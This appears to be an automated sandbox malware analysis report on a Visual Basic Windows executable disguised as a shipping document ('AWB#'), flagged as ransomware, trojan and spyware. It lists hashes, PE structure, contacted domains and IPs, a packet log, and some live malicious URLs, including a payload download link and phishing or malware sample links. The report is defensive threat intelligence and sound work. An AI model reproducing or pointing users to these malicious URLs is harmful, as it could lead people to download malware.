      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      lifeandhealth.com.mx
      		192.185.170.106
      		truefalseunknown
      algulmotors.com
      		94.237.90.68
      		truefalse
        		unknown
        www.baizhan180.xyz
        		103.53.126.132
        		truetrue
          		unknown
          www.algulmotors.com
          		unknown
          		unknowntrue
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpfalse
              		high
              http://www.fontbureau.comexplorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpfalse
                		high
                http://www.fontbureau.com/designersGexplorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpfalse
                  		high
                  http://www.fontbureau.com/designers/?explorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpfalse
                    		high
                    http://www.founder.com.cn/cn/bTheexplorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers?explorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpfalse
                      		high
                      http://www.tiro.comexplorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://lifeandhealth.com.mx/graceofgod/floow_tAAkniYUly238.binAWB# 9284730932.exetrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.fontbureau.com/designersexplorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpfalse
                        		high
                        http://www.goodfont.co.krexplorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.carterandcone.comlexplorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.sajatypeworks.comexplorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.typography.netDexplorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpfalse
                          		high
                          http://www.founder.com.cn/cn/cTheexplorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://fontfabrik.comexplorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.founder.com.cn/cnexplorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpfalse
                            		high
                            http://www.jiyu-kobo.co.jp/explorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.galapagosdesign.com/DPleaseexplorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers8explorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpfalse
                              		high
                              http://www.fonts.comexplorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpfalse
                                		high
                                http://www.sandoll.co.krexplorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.urwpp.deDPleaseexplorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.zhongyicts.com.cnexplorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.sakkal.comexplorer.exe, 0000000D.00000000.353751976.000000000BC36000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                192.185.170.106
                                		unknownUnited States
                                		46606UNIFIEDLAYER-AS-1USfalse
                                103.53.126.132
                                		unknownChina
                                		137697CHINATELECOM-JIANGSU-YANGZHOU-IDCCHINATELECOMJiangSuYangZtrue

                                General Information

                                Joe Sandbox Version:31.0.0 Red Diamond
                                Analysis ID:320390
                                Start date:19.11.2020
                                Start time:10:14:10
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 9m 15s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Sample file name:AWB# 9284730932.exe
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:21
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:1
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.rans.troj.spyw.evad.winEXE@7/0@4/2
                                EGA Information:Failed
                                HDC Information:
                                • Successful, ratio: 14.5% (good quality ratio 12.9%)
                                • Quality average: 72.5%
                                • Quality standard deviation: 31.8%
                                HCA Information:
                                • Successful, ratio: 63%
                                • Number of executed functions: 173
                                • Number of non-executed functions: 232
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .exe
                                Warnings:
                                Show All
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 104.43.139.144, 52.255.188.83, 168.61.161.212, 23.54.113.104, 51.104.139.180, 51.103.5.186, 23.0.174.185, 23.0.174.200, 20.54.26.129
                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, client.wns.windows.com, fs.microsoft.com, arc.msn.com.nsatc.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, par02p.wns.notify.windows.com.akadns.net, umwatsonrouting.trafficmanager.net, skypedataprdcoleus17.cloudapp.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net
                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                No simulations

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                No context

                                ASN

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                UNIFIEDLAYER-AS-1USDocument3327.xlsbGet hashmaliciousBrowse
                                • 198.57.244.39
                                POSH XANADU Order-SP-20093000-xlxs.xlsxGet hashmaliciousBrowse
                                • 192.185.144.204
                                dVcML4Zl0J.dllGet hashmaliciousBrowse
                                • 192.232.229.53
                                JTWtIx6ADf.dllGet hashmaliciousBrowse
                                • 192.232.229.53
                                yrV5qWOmi3.dllGet hashmaliciousBrowse
                                • 192.232.229.53
                                bGtm3bQKUj.exeGet hashmaliciousBrowse
                                • 192.185.41.224
                                http://sanwhyl.seclenght.ml/whelst/8728WKEE_773_JDG833.htmlGet hashmaliciousBrowse
                                • 162.214.72.58
                                https://app.box.com/s/frm9cufh9ljwjmsdcrv6gioilzlttstrGet hashmaliciousBrowse
                                • 162.241.41.34
                                https://pornshare.cyou/mnbvcgh/loiuhgf/Get hashmaliciousBrowse
                                • 162.241.143.221
                                Invoice_99012_476904.xlsmGet hashmaliciousBrowse
                                • 192.232.229.53
                                Invoice_37081_761967.xlsmGet hashmaliciousBrowse
                                • 162.241.44.26
                                https://juicytatesful.com/re/Get hashmaliciousBrowse
                                • 162.241.126.121
                                https://damartex-my.sharepoint.com/:o:/g/personal/gvernon_damart_com/EiJSECE48EZEjXDMHc8NQJgBxBqgSsD-ZFrLB4gCHeMTJA?e=FDTAvaGet hashmaliciousBrowse
                                • 162.241.127.155
                                https://rb.gy/pt1wisGet hashmaliciousBrowse
                                • 192.254.234.249
                                https://finnhammars-my.sharepoint.com/:o:/g/personal/erica_roempke_finnhammars_se/Ej-Z4o-5sm9DnKA3qpnhRyYBtAZylN4t5DisuS7MSGCA_g?e=BQY0iuGet hashmaliciousBrowse
                                • 162.241.116.106
                                https://finnhammars-my.sharepoint.com/:o:/g/personal/erica_roempke_finnhammars_se/Ej-Z4o-5sm9DnKA3qpnhRyYBtAZylN4t5DisuS7MSGCA_g?e=BQY0iuGet hashmaliciousBrowse
                                • 162.241.116.106
                                BL, Invoices.exeGet hashmaliciousBrowse
                                • 162.241.230.107
                                JmuEmJ4T4r5bc8S.exeGet hashmaliciousBrowse
                                • 192.185.5.77
                                Invoice_043866_370540.xlsmGet hashmaliciousBrowse
                                • 192.232.229.53
                                PO.no.12.exeGet hashmaliciousBrowse
                                • 192.185.165.195
                                CHINATELECOM-JIANGSU-YANGZHOU-IDCCHINATELECOMJiangSuYangZhttp://u5211565.ct.sendgrid.net/ls/click?upn=WMyH9YN8LdKDieVpBZafOAkyXJmwjIodeD89r6jXhi6WE1kr-2Fs2aN9q8T-2BZZFRV6682zZEeStREygPngvBuFdg-3D-3DcJ4Z_xK1japI3Lshn3uPvI4t5LvKvla0O3p8IBpVMjoMpI9l7u2DlehHWWkACqnJ0Msh7ts3W7Y7EcTH19d3-2BhLEFHddky9huDGJDs5LkRUgj2LnbhIz-2BbIp5VMZCwIMGV8rbg9rIVINs4f7mWj9dYoFwUuGqG2k06xIXROBZ-2B0vP7BO5EMP6Xax1f3K9LawJpqk-2BXhpbyhByUn-2B5jPzqG2wtuzatFicfKTfp8Ahf6HPW6qk-3DGet hashmaliciousBrowse
                                • 103.60.165.118
                                https://u2867613.ct.sendgrid.net/ls/click?upn=xIoWet-2BTMg-2BVfl4m7Gz858a6bYE3yZGH61RmRbvDHYhDUUyAr1Khjkxjj-2BCUfZyREJKkLWm9kXM9xf2kpkPym7RRw-2FwPrffbBsg-2F9xfKVDnOmgo93gbmBWdQlqyAyP6o2T8m_UI-2Fa1HdcsOvWi0gT08Rm2AqxEWew-2BvQc9v-2FOJ0CFs-2Fqmzwsz0zZu1Q-2BhEiFDm76OxMI40TkUvAXI0PiE1M2-2FS3oBYErkDgrtvY8yQsueuZcmX1DOoK-2FGmjPfEq0WBdYkjBYItiWl4s0ifjNMViDKhI9pbY0wredclLKDY7HERPktB19FV8A6-2BUXfbzMfngXRV255yqgwGHIOt9NkZc15pe89ff-2FrtjvpWWMIjahF0XA-3DGet hashmaliciousBrowse
                                • 103.60.165.118

                                JA3 Fingerprints

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                37f463bf4616ecd445d4a1937da06e19https://www.canva.com/design/DAENqED8UzU/0m_RcAQIILTwa79MyPG8KA/view?utm_content=DAENqED8UzU&utm_campaign=designshare&utm_medium=link&utm_source=sharebuttonGet hashmaliciousBrowse
                                • 192.185.170.106
                                https://akljsdhfas.selz.com/?Get hashmaliciousBrowse
                                • 192.185.170.106
                                doc2227740.xlsGet hashmaliciousBrowse
                                • 192.185.170.106
                                d11311145.xlsGet hashmaliciousBrowse
                                • 192.185.170.106
                                Original Shipment Document.exeGet hashmaliciousBrowse
                                • 192.185.170.106
                                PO#0007507_009389283882873PDF.exeGet hashmaliciousBrowse
                                • 192.185.170.106
                                MV GRAN LOBO 008.xlsxGet hashmaliciousBrowse
                                • 192.185.170.106
                                http://www.ericbess.com/ericblog/2008/03/03/wp-codebox/#examplesGet hashmaliciousBrowse
                                • 192.185.170.106
                                https://app.archbee.io/doc/wjFBJ1IQgNqcYtxyaUfi5/V9dqJTS3iO58EgXIT7wr1Get hashmaliciousBrowse
                                • 192.185.170.106
                                https://lfonoumkgl.zizera.com/FXGet hashmaliciousBrowse
                                • 192.185.170.106
                                ACH WlRE PAYMENT REMlTTANCE.xlsxGet hashmaliciousBrowse
                                • 192.185.170.106
                                https://view.publitas.com/ipinsurance/demers-beaulne-inc/Get hashmaliciousBrowse
                                • 192.185.170.106
                                ACH - WlRE PAYMENT REMlTTANCE.xlsxGet hashmaliciousBrowse
                                • 192.185.170.106
                                https://t.co/DmCKxDTz1SGet hashmaliciousBrowse
                                • 192.185.170.106
                                http://customer.cartech.com/inventory_manufacturing.cfmGet hashmaliciousBrowse
                                • 192.185.170.106
                                ACHWlRE REMlTTANCE ADVlCE..xlsxGet hashmaliciousBrowse
                                • 192.185.170.106
                                https://www.canva.com/design/DAEN4Gk1aAs/uErgK6sn3gPozGMXWtYgqA/view?utm_content=DAEN4Gk1aAs&utm_campaign=designshare&utm_medium=link&utm_source=sharebuttonGet hashmaliciousBrowse
                                • 192.185.170.106
                                win_encryptor.exeGet hashmaliciousBrowse
                                • 192.185.170.106
                                ACH WlRE REMlTTANCE PAYMENT.xlsxGet hashmaliciousBrowse
                                • 192.185.170.106
                                https://www.google.com/url?q=https://sedgefuneralplan.com/pinafore.php&sa=D&ust=1605725146740000&usg=AOvVaw1JCRUh1siinDauICG91nF3Get hashmaliciousBrowse
                                • 192.185.170.106

                                Dropped Files

                                No context

                                Created / dropped Files

                                No created / dropped files found

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):5.439880208207643
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.15%
                                • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:AWB# 9284730932.exe
                                File size:86016
                                MD5:e69d0c42f97a007fb131b35cb8a4d7b8
                                SHA1:43ca208070bb88754a1d8626ea0ef596a6db1f72
                                SHA256:6e8b2b06ac2b8447aec7075c5c58edbe5a5377d74c9443e5caf9f379f53a8b6d
                                SHA512:634db71b4126d06a4fe0686b700d85d71781b952da07419d00e46c9193f5fdadc8d4f533c918dd9db2dcbcd97f3bbe3cb018b6a57dc7ea78835f89bf369b4d6c
                                SSDEEP:1536:Z7Y8d0PEBgVvVwZw9TPz2CN2a85ZTqetgD/k:BSVvVPTaCNEZTG/k
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......_................. ...0...............0....@................

                                File Icon

                                Icon Hash:20047c7c70f0e004

                                Static PE Info

                                General

                                Entrypoint:0x4016d8
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                DLL Characteristics:
                                Time Stamp:0x5FB5ED8C [Thu Nov 19 03:59:08 2020 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:1df1cc653eca0e7ef0f1b96ca8b2c716

                                Entrypoint Preview

                                Instruction
                                push 004017ECh
                                call 00007FA8D096B103h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                xor byte ptr [eax], al
                                add byte ptr [eax], al
                                inc eax
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [esp+eax*2+7Dh], ah

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x127b40x28.text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x150000x8f8.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
                                IMAGE_DIRECTORY_ENTRY_IAT0x10000x148.text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x11d040x12000False0.408949110243data5.87781768033IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                .data0x130000x11f80x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                .rsrc0x150000x8f80x1000False0.166748046875data1.94865951116IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountry
                                RT_ICON0x157c80x130data
                                RT_ICON0x154e00x2e8data
                                RT_ICON0x153b80x128GLS_BINARY_LSB_FIRST
                                RT_GROUP_ICON0x153880x30data
                                RT_VERSION0x151500x238dataItalianItaly

                                Imports

                                DLLImport
                                MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaLateMemSt, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFPFix, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaVarTstEq, __vbaI2I4, __vbaObjVar, __vbaCastObjVar, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaI2Var, _CIlog, __vbaFileOpen, __vbaNew2, __vbaR8Str, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaVarSetObj, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarDup, __vbaVarLateMemCallLd, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                                Version Infos

                                DescriptionData
                                Translation0x0410 0x04b0
                                InternalNameMorgenkvisten
                                FileVersion2.00
                                CompanyNameKTS Division
                                ProductNameKTS Division
                                ProductVersion2.00
                                OriginalFilenameMorgenkvisten.exe

                                Possible Origin

                                Language of compilation systemCountry where language is spokenMap
                                ItalianItaly

                                Network Behavior

                                Snort IDS Alerts

                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                11/19/20-10:16:51.777947ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.58.8.8.8

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Nov 19, 2020 10:15:47.001530886 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:47.146100998 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.146208048 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:47.184855938 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:47.329006910 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.330713987 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.330746889 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.330766916 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.330816031 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:47.330847025 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:47.456859112 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:47.601548910 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.602027893 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:47.627974987 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:47.778048992 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.778078079 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.778137922 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.778153896 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.778189898 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:47.778192997 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.778209925 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.778227091 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.778245926 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.778254032 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:47.778264999 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.778280973 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.778286934 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:47.778382063 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:47.778390884 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:47.922759056 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.922785044 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.922801971 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.922817945 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.922827959 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:47.922863960 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:47.922902107 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.922985077 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.923032999 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:47.923104048 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.923193932 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:47.923460960 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.923476934 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.923517942 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:47.923540115 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:47.923583031 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.923706055 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.923737049 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.923753023 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.923753977 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:47.923774004 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.923804998 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.923814058 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:47.923823118 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.923831940 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:47.923883915 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:47.923908949 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.923969984 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:47.923984051 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.924040079 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.924041033 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:47.924062014 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:47.924087048 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:47.924113989 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.067143917 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.067167044 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.067183971 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.067198992 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.067218065 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.067234993 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.067251921 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.067301035 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.067307949 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.067317963 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.067333937 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.067349911 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.067349911 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.067365885 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.067397118 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.067409992 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.067435980 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.067454100 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.068613052 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.068633080 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.068648100 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.068717957 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.068734884 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.068739891 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.068799019 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.068799973 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.068816900 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.068840981 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.068878889 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.068918943 CET44349720192.185.170.106192.168.2.5
